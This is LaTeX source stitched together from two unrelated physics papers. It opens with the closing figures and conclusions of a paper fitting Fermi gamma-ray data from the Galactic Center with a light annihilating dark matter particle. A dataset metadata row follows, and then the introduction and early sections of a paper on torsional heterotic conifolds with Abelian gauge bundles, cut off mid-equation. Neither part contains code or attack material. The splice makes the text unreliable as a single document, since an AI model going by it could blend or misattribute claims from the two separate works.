{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle1-10-backonly-diskdiffuse.ps}}\\
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsanglegt10-diskdiffuse.ps}}
\hspace{0.5cm}
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsanglegt30-diskdiffuse.ps}}\\
\vspace{-0.3cm}
\caption{The angular distribution of gamma rays around the Galactic Center observed by the FGST. In each frame, the dashed line denotes the shape predicted for the annihilation products of dark matter distributed according to a halo profile which is slightly cuspier than NFW ($\gamma=1.1$). The dotted line is the prediction from the previously discovered TeV point source located at the Milky Way's dynamical center, while the dot-dashed line denotes the diffuse background described in the text (which, although included in each case, falls below the range of rates shown in the upper four frames). The solid line is the sum of these contributions.}
\label{angular}
\end{center}
\end{figure*}
Thus far, we have performed these fits while remaining agnostic about the mass, annihilation cross section, and dominant annihilation channels of the dark matter particle, simply normalizing the angular shape predicted by our selected halo profile to the data. By comparing the relative normalizations required in each energy range shown in Fig.~\ref{angular}, however, one can infer the shape of the gamma ray spectrum from our dark matter component and for the diffuse background. In particular, the relative normalizations required of the diffuse component in the various energy ranges shown in Fig.~\ref{angular} imply that this background has a spectrum very approximately of the form $dN_{\gamma}/dE_{\gamma} \propto E^{-2.3}$.
In Fig.~\ref{spectrum}, we show the spectrum of photons observed by the FGST within 0.5$^{\circ}$ and 3$^{\circ}$ of the Galaxy's dynamical center, and compare this to the spectrum in our best fit annihilating dark matter (plus diffuse and HESS point source backgrounds) model, including the effect of the FGST's point spread function (which noticeably suppresses the lowest energy emission in the left frame). The distinctive bump-like feature observed at $\sim$1-5 GeV is easily accommodated by a fairly light dark matter particle ($m_{\rm dm} \approx 25-30$ GeV) which annihilates to a $b \bar{b}$ final state. The best-fit normalization corresponds to an annihilation cross section of $\sigma v \approx 9 \times 10^{-26}$ cm$^3$/s, which is about a factor of three larger than that predicted for a simple $s$-wave annihilating thermal relic.
\begin{figure*}[!]
\begin{center}
{\includegraphics[angle=0,width=0.49\linewidth]{11pt5degreespec-diskdiffuse.ps}}
\hspace{0.1cm}
{\includegraphics[angle=0,width=0.49\linewidth]{113degreespec-diskdiffuse.ps}}\\
\vspace{-0.3cm}
\caption{The gamma ray spectrum measured by the FGST within 0.5$^{\circ}$ (left) and 3$^{\circ}$ (right) of the Milky Way's dynamical center. In each frame, the dashed line denotes the predicted spectrum from a 28 GeV dark matter particle annihilating to $b\bar{b}$ with a cross section of $\sigma v = 9\times 10^{-26}$ cm$^3$/s, and distributed according to a halo profile slightly more cusped than NFW ($\gamma=1.1$). The dotted and dot-dashed lines denote the contributions from the previously discovered TeV point source located at the Milky Way's dynamical center and the diffuse background, respectively. The solid line is the sum of these contributions.}
\label{spectrum}
\end{center}
\end{figure*}
It is interesting to note that the annihilation rate and halo profile shape found to best accommodate the FGST data here is very similar to that required to produce the excess synchrotron emission known as the ``WMAP haze''~\cite{wmaphaze}. To be produced by a dark matter particle as light as that described in this scenario, however, the observed hardness of the haze spectrum requires a fairly strong magnetic field in the region of the Galactic Center. It had been previously recognized that if the WMAP haze is the product of dark matter annihilations, then the FGST would likely be capable of identifying the corresponding gamma ray signal~\cite{Hooper:2007gi}.
The low mass and relatively large annihilation cross section required in this scenario are also encouraging for the prospects of other gamma ray searches for dark matter annihilation products, such as those observing dwarf galaxies and efforts to detect nearby subhalos.
In conclusion, we have studied the angular distribution and energy spectrum of gamma rays measured by the Fermi Gamma Ray Space Telescope in the region surrounding the Galactic Center, and find that this data is well described by a scenario in which a 25-30 GeV dark matter particle, distributed with a halo profile slightly steeper than NFW ($\gamma =1.1$), is annihilating with a cross section within a factor of a few of the value predicted for a thermal relic.
It should be noted, however, that if astrophysical backgrounds exist with a similar spectral shape and morphology to those predicted for annihilating dark matter (a spectrum peaking at $\sim 1-3$ GeV, distributed with approximate spherical symmetry around the Galactic Center proportional to $r^{-2.2}$), the analysis performed here would not differentiate the resulting background from dark matter annihilation products. Gamma rays from pion decay taking place with a roughly spherically symmetric distribution around the Galactic Center, for example, could be difficult to distinguish. Further information will thus be required to determine the origin of these photons.
{\it Acknowledgements:} We would like to thank Doug Finkbeiner for his help in processing the FGST data. We would also like to thank Greg Dobler and Neal Weiner for their helpful comments. DH is supported by the US Department of Energy, including grant DE-FG02-95ER40896, and by NASA grant NAG5-10842.%
| 2024-02-18T23:40:06.705Z | 2009-11-11T20:55:59.000Z | algebraic_stack_train_0000 | 1,368 | 2,298 |
|
\section{Introduction}
Heterotic compactifications to four dimensions have acquired over the years a cardinal interest for phenomenological applications, as their geometrical data combined with the
specification of a holomorphic gauge bundle have played a major role in recovering close relatives to the \textsc{mssm} or intermediate \textsc{gut}s. However, like their type
\textsc{ii} counterparts, heterotic Calabi-Yau compactifications are generally plagued by the presence of unwanted scalar degrees of freedom at low energies.
A fruitful strategy to confront this issue has proven to be the inclusion of fluxes through well-chosen cycles in the compactification manifold. Considerable effort has been successfully
invested in engineering such constructions in type \textsc{ii} supergravity scenarios (see~\cite{Grana} for a review and references therein). However, if one is eventually to uncover the
quantum theory underlying these backgrounds, warranting their consistency as string theory vacua, or to evade the large-volume limit where supergravity is valid,
one has to face the presence of \textsc{rr} fluxes intrinsic to these type \textsc{ii} backgrounds, for which a worldsheet analysis is still lacking.
In this respect, heterotic geometries with \textsc{nsns} three-form and gauge fluxes are more likely to allow for such a description: since the dilaton is not stabilized
perturbatively, the worldsheet theory should be amenable to standard \textsc{cft} techniques. The generic absence of a large-volume limit in heterotic flux compactifications makes even this
appealing possibility a {\it necessity}. An attempt at uncovering an underlying worldsheet theory for heterotic flux vacua has been made
in~\cite{Adams:2006kb,Adams:2009zg} by resorting to linear sigma-model techniques. This approach however yields
a fully tractable description only in the \textsc{uv}, while the interacting \textsc{cft} obtained in the \textsc{ir} is not known explicitly.
A consistent smooth heterotic compactification requires determining a gauge bundle that satisfies a list of consistency conditions. This sheds yet another light on the appearance of
non-trivial Kalb-Ramond fluxes, now understood as the departure, triggered by the choice of an alternative gauge bundle, from the standard embedding of the spin connection into the
gauge connection that characterizes Calabi-Yau compactifications. This eventually leads to geometries with torsion. Now, heterotic flux compactifications, although
known for a long time (see e.g.~\cite{Strominger:1986uh,Hull:1986kz,Becker:2002sx,Curio:2001ae,Louis:2001uy,LopesCardoso:2003af,Becker:2003yv,Becker:2003sh,Becker:2005nb,Benmachiche:2008ma})
are usually far less understood than their type \textsc{iib} counterparts.\footnote{Note that duality can then be applied to specific heterotic models of this kind to map them to type \textsc{ii}
flux compactifications of interest for moduli stabilization~\cite{Dasgupta:1999ss,Becker:2002sx}.}
In particular, having a non-trivial $\mathcal{H}$-flux threading the geometry results in the metric losing K\"ahlerity (see~\cite{Goldstein:2002pg} for the analysis of $T^2$ fibrations over $K3$)
and being conformally balanced instead of Calabi-Yau~\cite{Mich,Ivanov:2000ai,LopesCardoso:2002hd}. This is a major drawback for the analysis of such backgrounds, as theorems of K\"ahler
geometry (such as Yau's theorem) do not hold anymore, making the existence of solutions to the tree-level supergravity equations dubious, let alone their extension to exact string vacua.
An additional and general complication for heterotic solutions comes from anomaly cancellation, which requires satisfying the Bianchi identity in the presence of torsion. This usually proves
notoriously arduous as this differential constraint is highly non-linear. A proof of the existence of a family of smooth solutions to the leading-order Bianchi identity has only
appeared recently~\cite{Fu:2006vj} (see also~\cite{Goldstein:2002pg} for an earlier discussion of $T^2\times K3$ fibrations, as well as~\cite{Becker:2006et,Fu:2008ga,Becker:2008rc} for developments).
Moduli spaces of heterotic compactifications have singularities that arise whenever the gauge bundle degenerates to 'point-like instantons', either at regular points or at singular points of the
compactification manifold. In the case of $\mathcal{N}=1$ compactifications in six dimensions, the situation is well understood. Point-like instantons at regular points of $K3$ signal the appearance
of non-perturbative $Sp(k)$ gauge groups in the case of $Spin(32)/\mathbb{Z}_2$~\cite{Witten:1995gx}, while for $E_8 \times E_8$ one gets tensionless \textsc{bps} strings~\cite{Ganor:1996mu}, leading
to interacting \textsc{scft}s. In both cases,
the near-core 'throat' geometry of small instantons is given by the heterotic solitons of Callan, Harvey and Strominger~\cite{Callan:1991dj} (hereafter called \textsc{chs}), which become heterotic
five-branes in the point-like limit.
In the case of four-dimensional $\mathcal{N}=1$ \textsc{cy}$_3$ compactifications, let alone torsional vacua, the situation is less understood. For a particular class of \textsc{cy}$_3$ which are $K3$
fibrations, one can resort to the knowledge of the six-dimensional models mentioned above --~advocating an 'adiabatic' argument~-- in order to understand the physics in the vicinity of such singularities~\cite{Kachru:1996ci,Kachru:1997rs}.
Recently, a study of heterotic flux backgrounds, supporting an Abelian line bundle, has been initiated~\cite{Carlevaro:2008qf}.
In a specific double-scaling limit of these torsional vacua, the corresponding worldsheet non-linear sigma model has been shown to admit a solvable
\textsc{cft} description, belonging to a particular class of gauged \textsc{wzw} models, whose partition function and low-energy spectrum could be established.
In the double-scaling limit where this \textsc{cft} description emerges, one obtains non-compact torsional manifolds, that can be viewed as local models of
heterotic flux compactifications, in the neighborhood of singularities supporting Kalb-Ramond and magnetic fluxes. In analogy with the Klebanov--Strassler
(\textsc{ks}) solution~\cite{Klebanov:2000hb}, which plays a central role in understanding type \textsc{iib} flux backgrounds~\cite{Giddings:2001yu}, these
local models give a good handle on degrees of freedom localized in the 'throat' geometries.
The solutions we are considering correspond to the near-core geometry of 'small' gauge instantons sitting on geometrical singularities,
and their resolution. Generically, the torsional nature of the geometry can come solely from the {\it local} backreaction of the gauge instanton (as for the \textsc{chs}
solution that corresponds to a gauge instanton on a $K3$ manifold that is globally torsionless), or thought of being part of a {\it globally} torsional compactification.\footnote{For certain choices of
gauge bundle, the Eguchi-Hanson model that we studied in~\cite{Carlevaro:2008qf} could be of both types.} From the point of view
of the effective four- or six-dimensional theory, these solutions describe (holographically) the physics taking place at non-perturbative transitions of the
sort discussed above, or in their neighborhood in moduli space.
In the present work we concentrate on heterotic flux backgrounds preserving $\mathcal{N}=1$ supersymmetry in four dimensions. More specifically
we consider codimension four conifold singularities~\cite{Candelas:1989js}, supplemented by a non-standard gauge bundle which induces non-trivial torsion in the $SU(3)$ structure connection. For definiteness we opt for $Spin (32)/\mathbb{Z}_2$ heterotic string theory. The Bianchi identity is satisfied for an appropriate Abelian bundle, which solves the differential constraint in the large charge limit, where the curvature correction to the identity becomes sub-dominant. Subsequently, numerical solutions to the $\mathcal{N}=1$ supersymmetry equations~\cite{Strominger:1986uh} can be found, which feature non-K\"ahler spaces corresponding to warped torsional conifold geometries with a non-trivial dilaton. At large distance from the singularity, their geometry reproduces the usual Ricci-flat conifold, while in the bulk we observe a squashing of the $T^{1,1}$ base, as the radius of its $S^1$ fiber is varying.
The topology of this class of torsional spaces allows to resolve the conifold singularity by a blown-up $\mathbb{C}P^1 \times \mathbb{C}P^1$
four-cycle, provided we consider a $\mathbb{Z}_2$ orbifold of the original conifold space, which
avoids the potential bolt singularity. In contrast, in the absence of the orbifold only small resolution by a
blown-up two-cycle or deformation to a three-cycle remain as possible resolutions of the singularity. The specific de-singularisation we are considering here is particularly amenable to heterotic or
type~I constructions, as it leads to a normalizable harmonic two-form which can support an extra magnetic gauge flux (type \textsc{iib} conifolds with blown-up four-cycles and D3-branes were discussed in~\cite{PandoZayas:2001iw,Lu:2002rk,Benvenuti:2005qb}). The numerical supergravity solutions found in this case are perfectly smooth everywhere, and the string coupling can be chosen everywhere small,
while in the blow-down limit the geometrical singularity is also a strong coupling singularity.
In the regime where the blow-up parameter $a$ is significantly smaller (in string units) than the norm of the vectors of magnetic charges, one
can define a sort of 'near-horizon' geometry of this family of solutions, where the warp factor acquires a power-like behavior. This region can be decoupled from the
asymptotic Ricci-flat region by defining a double scaling limit~\cite{Carlevaro:2008qf} which sends the asymptotic string coupling $g_s$ to zero,
while keeping the ratio $g_s/ a^2$ fixed in string units.
In this limit we are able to find an analytical solution (that naturally gives an accurate
approximation of the asymptotically Ricci-flat solution in the near-horizon region of
the latter), where the dilaton becomes asymptotically linear, while the effective
string coupling, defined at the bolt, can be set to any value by the double-scaling parameter.
Remarkably, the double-scaling limit of this family of torsional heterotic backgrounds admits a
solvable worldsheet \textsc{cft} description, which we construct explicitly in terms of an asymmetric
gauged \textsc{wzw} model,\footnote{Notice that gauged \textsc{wzw} models for a class
of $T^{p,q}$ spaces have been constructed in~\cite{PandoZayas:2000he}. However these cosets, that are not heterotic in nature and do not support gauge bundles,
cannot be used to obtain supersymmetric string backgrounds.} which is parametrised by the two vectors $\vec{p}$ and $\vec{q}$ (dubbed hereafter 'shift vectors')
giving the embedding of the two magnetic fields in the Cartan subalgebra of $\mathfrak{so}(32)$. We establish this correspondence by showing that, integrating out
classically the worldsheet gauge fields, one obtains a non-linear sigma-model whose background fields reproduce the warped resolved orbifoldized conifold with flux.
This result generalizes the \textsc{cft} description for heterotic gauge bundles over Eguchi-Hanson (\textsc{eh}) space or \textsc{eh}$\times T^2$ we achieved in a previous work~\cite{Carlevaro:2008qf}.
The existence of a worldsheet \textsc{cft} for this class of smooth conifold solutions first implies that these backgrounds are exact heterotic string vacua to all orders in $\alpha'$, once included the worldsheet quantum corrections to the defining gauged \textsc{wzw} models.
This can be carried out by using the method developed in~\cite{Tseytlin:1992ri,Bars:1993zf,Johnson:2004zq} and usually amounts to a finite correction to the metric. Furthermore, this also entails that the Bianchi identity is exactly satisfied even when the magnetic charges are not large, at least in the near-horizon regime.
Then, by resorting to the algebraic description of coset \textsc{cft}s, we establish the full tree-level string spectrum
for these heterotic flux vacua, with special care taken in treating both discrete and continuous representations corresponding
respectively to states whose wave-functions are localized near the singularity, and to states whose wave-functions are delta-function normalizable.
Dealing with arbitrary shift vectors $\vec{p}$ and $\vec{q}$ in full generality turns out to be technically cumbersome, as the arithmetical
properties of their components play a role in the construction. We therefore choose to work out the complete solution of the theory
for a simple class of shift vectors that satisfy all the constraints. We compute the one-loop partition function in this case
(which vanishes thanks to space-time supersymmetry), and study in detail the spectrum of localized massless states.
In addition, the \textsc{cft} construction given here provides information about worldsheet instanton corrections. These worldsheet
non-perturbative effects are captured by Liouville-like interactions correcting the sigma-model action, that are expected to correspond to
worldsheet instantons wrapping one of the $\mathbb{C}P^1$s of the four-cycle. We subsequently analyze under which conditions the Liouville potentials
dictated by the consistency of the \textsc{cft} under scrutiny are compatible with the whole construction (in particular with the orbifold
and~\textsc{gso} projections). This allows to understand known constraints in heterotic supergravity vacua (such as the constraint
on the first Chern class of the gauge bundle) from a worldsheet perspective.
Finally, considering that in the double-scaling limit we mentioned above these heterotic torsional vacua feature an asymptotically linear dilaton, we argue that they should
admit a holographic description~\cite{Aharony:1998ub}. The dual theory should be a novel kind of little string theory, specified by
the shift vector $\vec{p}$ in the \textsc{uv}, flowing at low energies to a four-dimensional $\mathcal{N}=1$ field theory. This theory
sits on a particular branch in its moduli space, corresponding to the choice of second shift vector $\vec{q}$, and parametrized by
the blow-up mode. We use the worldsheet \textsc{cft} description of the gravitational dual in order to study the chiral operators of this
four-dimensional theory, thereby obtaining the R-charges and representations under the global symmetries for a particular class of them. From the
properties of the heterotic supergravity solution, we argue that the $Spin(32)/\mathbb{Z}_2$ blown-up backgrounds seem to be confining,
while for the $E_8\times E_8$ theory the blow-down limit gives an interacting superconformal field theory.
This work is organized as follows. Section~2 contains a short review of supersymmetric heterotic flux compactifications. In section~3 we obtain the heterotic supergravity backgrounds of interest, featuring torsional smooth conifold solutions.
We provide the numerical solutions for the full asymptotically Ricci-flat vacua together with
the analytical solution in the double-scaling limit. In addition we study the torsion classes of these solutions and their (non-)K\"ahlerity.
In section~4 we discuss the corresponding worldsheet \textsc{cft} by identifying the relevant heterotic gauged \textsc{wzw} model.
In section~5 we explicitly construct the complete one-loop partition function and analyze worldsheet non-perturbative effects.
Finally in section~6 we summarize our results and discuss two important aspects: the holographic duality
and the embedding of these non-compact torsional backgrounds in heterotic compactifications. In addition, some details about the gauged \textsc{wzw} models
at hand and general properties of superconformal characters are given in two appendices.
\section{$\mathcal{N}$=1 Heterotic vacua with Torsion}
In this section we review some known facts about heterotic supergravity and compactifications to four dimensions preserving $\mathcal{N}=1$ supersymmetry. This will
in particular fix the various conventions that we use in the rest of this work.
\subsection{Heterotic supergravity}
The bosonic part of the ten-dimensional heterotic supergravity action reads (in string frame):
\begin{equation}\label{het-lag-sugra}
S=\frac{1}{\alpha'^4}\int \mathrm{d}^{10}x \sqrt{-G}e^{-2\Phi}\,\Big[
R+4|\partial\Phi|^2-\frac{1}{2}|\mathcal{H}|^2+\frac{\alpha'}{4}\big(\mbox{Tr}_{\text{V}}|\mathcal{F}|^2+\text{tr}|\mathcal{R}_+|^2\big)
\Big]\,.
\end{equation}
with the norm of a $p$-form field strength $\mathcal{G}_{[p]}$ defined as $|\mathcal{G}|^2=\nicefrac{1}{p!}\,\mathcal{G}_{M_1..M_p}\mathcal{G}^{M_1..M_p}$. The trace of the Yang-Mills kinetic term is taken in the
vector representation of $SO(32)$ or $E_8\times E_8$.\footnote{We have chosen to work with anti-hermitian gauge fields, hence the positive sign in front of the gauge kinetic term.}
In keeping with the modified Bianchi identity~(\ref{bianchi}) below, we have included in~(\ref{het-lag-sugra}) the leading string correction to the supergravity Lagrangian. It involves the
generalized curvature two-form $\mathcal{R}(\Omega_{+})^{A}_{\phantom{A}B}$
built out of a Lorentz spin connexion $\Omega_+$ that incorporates torsion, generated by the presence of a non-trivial \textsc{nsns} three-form flux:\footnote{Its contribution to~(\ref{het-lag-sugra}) is normalized as
$\text{tr}|\mathcal{R}_+|^2= \tfrac12\, \mathcal{R}(\Omega_+)_{MN\,AB}\mathcal{R}(\Omega_+)^{MN\,AB}
$, the letters $M,N$ and $A,B$ denoting the ten-dimensional coordinate and frame indices, respectively.}
\begin{equation}\label{genO}
\Omega^{\phantom{\pm}A}_{\pm\,\phantom{A}B} = \omega^{A}_{\phantom{A}B} \pm \tfrac12 \mathcal{H}^{A}_{\phantom{A}B}\,.
\end{equation}
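For later reference, the curvature two-form entering the one-loop terms is constructed from this torsionful connection in the standard way:
\begin{equation}
\mathcal{R}(\Omega_{\pm})^{A}_{\phantom{A}B} = \mathrm{d}\Omega^{\phantom{\pm}A}_{\pm\,\phantom{A}B} + \Omega^{\phantom{\pm}A}_{\pm\,\phantom{A}C}\wedge\Omega^{\phantom{\pm}C}_{\pm\,\phantom{C}B}\,,
\end{equation}
so that $\mathcal{R}(\Omega_{\pm})$ differs from the torsionless curvature by terms linear and quadratic in $\mathcal{H}$.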
In addition to minimizing the action~(\ref{het-lag-sugra}), a heterotic vacuum has to fulfil the generalized Bianchi identity:
\begin{equation}\label{bianchi}
\mathrm{d} \mathcal{H}_{[3]} = 8\alpha'\pi^2 \Big[\text{ch}_2\big(V \big)-p_1\big(\mathcal{R}(\Omega_{+})\big)
\Big]\,,
\end{equation}
here written in terms of the first Pontryagin class of the tangent bundle and the second Chern character of the gauge bundle $V$. The second topological
term on the right-hand side is the leading string correction to the Bianchi identity required by anomaly cancellation~\cite{Green:1984sg}, and mirrors the one-loop $\text{tr}|\mathcal{R}_+|^2$ correction included in the action~(\ref{het-lag-sugra}).\footnote{
Actually, one can add any torsion piece to the spin connexion $\Omega_+$ without spoiling anomaly cancellation~\cite{Hull:1985dx}.}
By considering gauge and Lorentz Chern-Simons couplings, one can now construct an \textsc{nsns} three-form which exactly solves the modified Bianchi identity (\ref{bianchi}):
\begin{equation}\label{3form}
\mathcal{H}_{[3]}= \mathrm{d} \mathcal{B}_{[2]}+ \alpha' \big( \omega_{[3]}^{L}(\Omega_+)-\omega_{[3]}^{\textsc{ym}}(\mathcal{A})\big) \, ,
\end{equation}
thus naturally including tree-level and one-loop corrections, given by:
\begin{equation}\label{CSform}
\omega_{[3]}^{\textsc{ym}}(\mathcal{A}) = \text{Tr}_{\textsc{v}}\left[ \mathcal{A}\wedge \mathrm{d}\mathcal{A} + \tfrac23 \,\mathcal{A}\wedge\mathcal{A}\wedge\mathcal{A}\right]
\,, \qquad
\omega_{[3]}^{L}(\Omega_{+})=\text{tr}\left[ \Omega_+\wedge \mathrm{d}\Omega_+ + \tfrac23 \,\Omega_+\wedge\Omega_+ \wedge\Omega_+\right]\,.
\end{equation}
\subsection{$\mathcal{N}$=1 supersymmetry and SU(3) structure}
In the absence of a fermionic background, a given heterotic vacuum preserves a portion of supersymmetry if there exists at least one Majorana-Weyl spinor $\eta$ of $Spin(1,9)$ satisfying
\begin{equation}\label{covar}
\nabla^{-}_{M}\eta\equiv \big( \partial_M + \tfrac14\, \Omega_{-\phantom{AB}M}^{\phantom{-}AB} \,\Gamma_{AB}\big)\,\eta
=0\,,
\end{equation}
i.e.\ $\eta$ is covariantly constant with respect to the connection with torsion $\Omega_-$ (note that the Bianchi identity is instead expressed in terms of $\Omega_+$).
This constraint enforces the vanishing of the supersymmetry variation of the gravitino; in the presence of a non-trivial dilaton and gauge field
strength, extra conditions have to be met, as we will see below.
In the presence of flux, the conditions on this globally defined spinor are related
to the possibility for the manifold in question to possess a reduced structure group, or
$G$-structure, which becomes the $G$ holonomy of $\nabla^-$ when the fluxes vanish (see~\cite{Salomon,Joyce,Gauntlett:2003cy} for details and review).
The requirement for a manifold $\mathcal{M}_d$ to be endowed with a $G$-structure is tied to its
frame bundle admitting a sub-bundle with fiber group $G$. This in turn implies the existence of a set of globally defined $G$-invariant tensors,
or alternatively, spinors on $\mathcal{M}_d$.
As will be discussed at greater length in section~\ref{torsion-cl}, the $G$-structure is specified by the intrinsic torsion of the manifold,
which measures the failure of the $G$-structure to become a $G$ holonomy of $\nabla^-$. By decomposing the intrinsic torsion into
irreducible $G$-modules, or torsion classes, we can thus consider classifying and determining the properties of different flux compactifications admitting the same $G$-structure.
\subsubsection*{Manifolds with SU(3) structure}
In the present paper, we will restrict to six-dimensional Riemannian spaces $\mathcal{M}_6$, whose reduced structure group is a subgroup of $SO(6)$, and focus on compactifications preserving
minimal ($\mathcal{N}=1$) supersymmetry in four dimensions, which calls for an $SU(3)$ structure group.\footnote{As a
general rule, reducing the dimension of the structure group increases the number of preserved supercharges.}
The structure is completely determined by a real two-form $J$ and a complex three-form $\Omega$,\footnote{The $SU(3)$ structure
is originally specified by the chiral complex spinor $\eta$, solution of~(\ref{covar}), $J$ and $\Omega$ being then defined as
$J_{mn}=-i\eta^{\dagger}\Gamma_{mn}\eta$ and $\Omega_{mnp}=\eta^{\top}\Gamma_{mnp}\eta$ respectively. In the following however we will not resort to this formulation.} which are globally defined and
satisfy the relations:
\begin{equation}\label{topcond}
\Omega\wedge \bar\Omega = -\frac{4i}{3}\, J\wedge J\wedge J\,,
\qquad \qquad
J\wedge \Omega =0\,.
\end{equation}
The last condition is related to the absence of $SU(3)$-invariant vectors or, equivalently, five-forms.
The 3-form $\Omega$ suffices to determine an almost complex structure $\mathcal{J}_m^{\ n}$, satisfying $\mathcal{J}^2=-\mathbb{I}$,
such that $\Omega$ is $(3,0)$ and $J$ is $(1,1)$. The metric on $\mathcal{M}_6$ is then given by $g_{mn}=\mathcal{J}_m^{\phantom{m}l}J_{ln}$, and the orientation of $\mathcal{M}_6$ is implicit in the choice of volume-form $\text{Vol}(\mathcal{M}_6)=(J\wedge J\wedge J)/6$.
For a background including \textsc{nsns} three-form flux $\mathcal{H}$, the structure forms $J$ and $\Omega$ are generically no longer closed, so that $\mathcal{M}_6$ departs from the usual Ricci-flat
\textsc{cy}$_3$ background and $SU(3)$ holonomy is lost.
\subsubsection*{Supersymmetry conditions}
We consider a heterotic background in six dimensions specified by a metric $g$, a dilaton $\Phi$, a three-form $\mathcal{H}$ and a gauge field strength $\mathcal{F}$.
Leaving aside the gauge bundle for the moment, it can be shown that preserving $\mathcal{N}=1$ supersymmetry in four dimensions is strictly equivalent
to solving the differential system for the $SU(3)$ structure:\footnote{
The original, alternative formulation \cite{Strominger:1986uh} of the supersymmetry conditions (\ref{susy-cond}-\ref{eqH}) replaces the constraint on the top form by
$|\Omega|=e^{-2\Phi}$,
which, inserted in eq.(\ref{susy-cond}), implies that the metric is conformally balanced \cite{Mich,Ivanov:2000ai,Becker:2006et}. The calibration equation for the flux (\ref{eqH}) can
also be rephrased as $\mathcal{H}=i(\bar{\partial}-\partial)J$.
This latter version of eq.(\ref{eqH}) is however restricted to the $SU(3)$-structure case, and does not lift to a general $G$-structure in dimension
$d$, unlike (\ref{susy-cond}a), which does upon replacing $J$ by the appropriate calibration $(d-4)$-form $\Xi$ (see for instance \cite{Gauntlett:2001ur}).}
\begin{subequations}\label{susy-cond}
\begin{align}
\mathrm{d} (e^{-2\Phi}\,\Omega)&=0\,,\\
\mathrm{d} (e^{-2\Phi}\,J\wedge J)&=0\,,
\end{align}
\end{subequations}
with the \textsc{nsns} flux related to the structure as follows \cite{Gauntlett:2001ur}:
\begin{equation}\label{eqH}
e^{2\Phi}\,\mathrm{d}(e^{-2\Phi}\,J) = \star_6 \mathcal{H}\,.
\end{equation}
Let us pause before tackling the supersymmetry constraint on the gauge fields and dwell on the significance of this latter expression. It has been observed that the
condition~(\ref{eqH}) reproduces a generalized K\"ahler calibration equation for $\mathcal{H}$~\cite{Gutowski:1999iu,Gutowski:1999tu}, since it is defined by the $SU(3)$-invariant form $J$. If we adopt a brane interpretation of a background with \textsc{nsns} flux, this equation acquires significance as a minimizing condition for the energy functional of five-branes wrapping K\"ahler two-cycles in $\mathcal{M}_6$. As noted in~\cite{Gauntlett:2003cy}, this analysis in terms of calibrations remains valid even when the full back-reaction of the brane configuration on the geometry is taken into account.\footnote{The argument is that one can always add an extra probe five-brane without breaking supersymmetry, provided it wraps a two-cycle calibrated by the same invariant form as the one calibrating the now back-reacted solution, hence the name {\it generalized} calibration.}
\subsection{Constraints on the gauge bundle}
We will now turn to the conditions the gauge field strength has to meet in order to preserve
$\mathcal{N}=1$ supersymmetry and to ensure the absence of global worldsheet anomalies.
Unbroken supersymmetry requires the vanishing of the gaugino variation:
\begin{equation}\label{gaugino}
\delta \chi = \frac14\,\mathcal{F}_{MN} \,\Gamma^{MN} \epsilon = 0\,.
\end{equation}
We see that, since the covariantly constant spinor $\eta$ is a singlet of the connection $\nabla^-$,
taking $\mathcal{F}$ in the adjoint of the structure group $SU(3)$ does not break any further supersymmetry, thus automatically satisfying~(\ref{gaugino}).
This is tantamount to requiring $\mathcal{F}$ to be an instanton of $SU(3)$:
\begin{equation}\label{Finstanton}
\mathcal{F}_{mn}= -\frac{1}{4}\,\big(J\wedge J\big)_{mn}^{\phantom{mn}kl}\,\mathcal{F}_{kl}
\qquad \Longleftrightarrow\qquad
\star_6 \mathcal{F}=-\mathcal{F}\wedge J\,.
\end{equation}
As pointed out in \cite{Strominger:1986uh}, this condition is equivalent to requiring the gauge bundle $V$ to satisfy the zero-slope limit of the Hermitian Yang-Mills equations:
\begin{subequations}\label{hym}
\begin{align}
\mathcal{F}^{(2,0)}= \mathcal{F}^{(0,2)}&=0\,, \\ \mathcal{F}^{a\bar b}J_{a\bar b}&=0\,.
\end{align}
\end{subequations}
The first equation entails that the gauge bundle has to be holomorphic, while the second is the tree-level Donaldson-Uhlenbeck-Yau (\textsc{duy}) condition, which is satisfied for $\mu$-stable bundles.
In addition, a line bundle is subject to a condition ensuring the absence of global anomalies in the heterotic worldsheet sigma-model~\cite{Witten:1985mj,Freed:1986zx}. This condition
(also known as K-theory constraint in type~I) amounts to a Dirac quantization condition for the $Spin(32)$ spinorial representation of positive chirality, that
appears in the massive spectrum of the heterotic string. It forces the first Chern class of the gauge bundle $V$ over $\mathcal{M}_6$ to be in the second even integral cohomology group.
In this work we consider only Abelian gauge backgrounds, hence the bundle needs to satisfy the condition:
\begin{equation}\label{Kth}
c_1(V) \in H^2(\mathcal{M},2\mathbb{Z}) \, \Longrightarrow \,\sum_{i=1}^{16} \int_{\Sigma_I} \frac{\mathcal{F}^i}{2\pi}\equiv 0 \mbox{ mod }2\,,\quad I=1,..,h_{1,1} \, .
\end{equation}
\section{Resolved Heterotic Conifolds with Abelian Gauge Bundles}
The supergravity solutions we are interested in are given as
a non-warped product of four-dimensional Minkowski space with a six-dimensional
non-compact manifold supporting \textsc{nsns} flux and an Abelian gauge bundle.
They preserve minimal supersymmetry ($\mathcal{N}=1$) in four dimensions and can be viewed
as local models of flux compactifications. For definiteness we choose $Spin(32)/\mathbb{Z}_2$ heterotic strings.
More specifically we take as metric ansatz a warped conifold geometry~\cite{Candelas:1989js}. The singularity is resolved by a K\"ahler deformation corresponding to blowing up a
$\mathbb{C} P^1\times \mathbb{C} P^1$ four-cycle on the conifold base. This is topologically possible only for a $\mathbb{Z}_2$ orbifold of the conifold, see below.\footnote{Without an orbifold the conifold singularity can be smoothed
out only by a two-cycle (resolution) or a three-cycle (deformation).} The procedure is
similar to that used in~\cite{PandoZayas:2001iw,Benvenuti:2005qb} to construct a smooth Ricci-flat orbifoldized conifold
by a desingularization \`a la Eguchi-Hanson. In our case however we have in addition non-trivial flux back-reacting on the geometry and deforming it away from Ricci-flatness by generating torsion in the background.
The geometry is conformal to a six-dimensional smoothed cone over a $T^{1,1}$ space.\footnote{We recall that $T^{1,1}$ is the coset
space $(SU(2)\times SU(2))/U(1)$ with the $U(1)$ action embedded symmetrically in the two $SU(2)$ factors.} It has therefore an
$SU(2)\times SU(2)\times U(1)$ group of continuous isometries. Considering $T^{1,1}$ as an $S^1$ fibration over a $\mathbb{C} P^1\times \mathbb{C} P^1$ base, the metric coefficient of the fiber depends on the radial coordinate of the cone, hence squashing $T^{1,1}$ away from its Einstein metric.
The metric and \textsc{nsns} three-form ans\"atze of the heterotic supergravity solution are chosen of the following form:
\begin{subequations} \label{sol-ansatz}
\begin{align}
\mathrm{d} s^2 & = \eta_{\mu\nu}\mathrm{d} x^{\mu}\mathrm{d} x^{\nu} +\tfrac{3}{2}\,H(r) \,\biggl[
